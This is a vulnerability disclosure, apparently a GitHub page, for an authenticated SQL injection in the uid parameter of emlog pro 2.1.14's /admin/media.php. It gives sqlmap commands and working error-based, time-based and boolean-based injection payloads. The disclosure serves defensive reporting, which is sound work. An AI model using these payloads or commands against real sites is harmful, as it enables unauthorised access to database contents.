/
CVE-2023-41623
40 lines (27 loc) · 1.81 KB
/
CVE-2023-41623
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
CVE-2023-41623
[Discoverer]:wuhaozhe
[NAME OF AFFECTED PRODUCT(S)] :https://github.com/emlog/emlog
[AFFECTED AND/OR FIXED VERSION(S)] : https://github.com/emlog/emlog - pro2.1.14
[Affected Component] :Affected source code files:media ,The affected code: $DB = Database::getInstance();$uid = Input::getStrVar('uid');,Affected url:/admin/media.php
[ Vulnerability Type]:sql inject
[Impact]:Attackers can detect internal information in the database
Method of reproducing vulnerabilities
First, when I log in to the admin account, I find that /admin/media.php? uid=1 This screen is used to view the user's uploaded picture. Because it is necessary to log in to the interface, so I use the burp tool to grab the request package of the administrator user to obtain the cookie, keep it in txt text, use sqlmap, the command is
sqlmap -r (administrator request package txt) --batch --level 3.
I use sqlmap tool to scan and find the payload that can be used.
Then I can use parameter --dbs to query the information in its database.
sqlmap -r /home/kali/nmapscan/cms.txt --batch --level 3 --dbs
> /admin/media.php?uid=1
> The following is the payload swept by sqlmap
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
> Payload: uid=1 AND (SELECT 6975 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(6975=6975,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
> Type: time-based blind
> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
> Payload: uid=1 AND (SELECT 6627 FROM (SELECT(SLEEP(5)))Rfyy)
> /admin/media.php?uid=1
> The following is the payload swept by sqlmap
> Parameter: uid (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: uid=1 AND 4765=4765